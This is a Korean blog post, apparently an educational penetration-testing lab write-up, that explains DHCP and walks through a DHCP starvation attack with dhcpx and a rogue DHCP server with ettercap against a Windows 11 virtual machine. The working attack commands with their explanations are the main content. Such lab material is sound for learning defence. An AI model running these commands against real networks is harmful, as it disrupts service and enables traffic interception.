인터넷을 하기 위해서는 컴퓨터나 모바일 기기마다 IP 주소를 설정해야 한다.
하지만 여러 개의 디바이스에 일일히 IP주소를 설정하는 일은 번거롭다.
뿐만 아니라 더 이상 사용하지 않는 디바이스가 생겼을 경우 IP주소를 회수해 와야 한다.
또한 실수로 여러 디바이스에 같은 IP를 할당하거나 오타를 냈을 경우 인터넷이 되지 않는다.
이런 번거로움을 해결하기 위해 사용하는 것이 DHCP이다.
DHCP는 IP주소를 효율적으로 관리하는데 도움을 준다.
컴퓨터를 비롯한 인터넷 디바이스에 자동으로 IP를 할당하고, 더 이상 필요없을 때는 회수한다.
라우터나 DHCP 서버에서 이런 작업을 하는데
오늘 다룰 DHCP 스푸핑에서는 DHCP 서버를 공격하는 작업을 해 볼 것이다.
스푸핑(Spooping)의 사전적 의미는 속이다 라는 뜻이다.
DHCP스푸핑은 공격 대상의 컴퓨터가 IP주소를 DHCP서버가 아닌
공격자가 설정한 컴퓨터에서 받아오도록 한다.
스푸핑을 당한 사용자는 자신도 모르게 해커가 제공하는 IP주소를 받게 된다.
DHCP 스푸핑은 두 단계로 이루어진다.
첫 번째는 DHCP 자원고갈 공격이다.
공격자는 먼저 가짜 신호를 보내 DHCP서버가 가지고 있는 IP주소를 전부 소진하게 만든다.
두 번째는 실제 DHCP 스푸핑 공격을 한다.
진짜 DHCP서버가 모든 IP주소를 소진하면
해커의 컴퓨터가 DHCP서버 흉내를 내어 해커가 의도한 IP주소를 공격 대상에게 제공한다.
공격 : Kali Linux 2023
대상 : Windows 11 Home
실습환경 : Macbook pro 2021 M1 pro
가상머신 : Vmware Fusion
1.
먼저 DHCP 자원고갈 공격부터 시작해 보자.
칼리 리눅스에서 iras를 설치한다.
┌──(root㉿kali)-[~]
└─# apt install -y irpas
설치가 끝나면 공격을 실행한다.
┌──(root💀kali)-[/home/kali/Desktop]
└─# /usr/sbin/dhcpx -i eth0 -D 192.168.30.100
명령어를 분석해 보자.
/usr/sbin/dhcpx (dhcpx실행) -i
eth0 (공격을 시작할 나의 랜카드 번호) -D
192.168.30.100 (공격할 서버 주소)
2.
자원고갈 공격이 시작되면 바로 DHCP 스푸핑을 시작한다.
아래와 같이 입력하면 해커의 컴퓨터가 DHCP 서버를 대신해 IP를 할당한다.
┌──(root💀kali)-[/home/kali/Desktop]
└─# ettercap -T -M dhcp:192.168.30.200-230/255.255.255.0/8.8.8.8
명령어를 분석해 보자.
ettercap -T -M
dhcp:192.168.30.200-230 (해커가 제공할 IP주소의 범위. 지금은 192.168.30.200부터 192.168.30.230 사이의 IP주소를 제공하도록 설정하였다.)
/255.255.255.0 (서브넷 마스크)
/8.8.8.8 (DNS주소)
공격 방법 자체는 어렵지 않다.
다만 중요한 것은 공격을 하는 원리가 무엇인지를 이해하는 것이다.
'모의 해킹' 카테고리의 다른 글
패킷 스니핑 세 번째_ARP Spooping 공격 (0) | 2024.05.30 |
---|---|
패킷 스니핑 두 번째 - dsniff 사용하기 (0) | 2024.05.29 |
패킷 스니핑 첫 번째 - TCPDump 사용하기 (0) | 2024.05.28 |
패킷 스니핑 공격의 기초와 준비 (0) | 2024.05.24 |
칼리 리눅스에서 윈도우 침투용 백도어 악성코드 만들기 (0) | 2024.05.06 |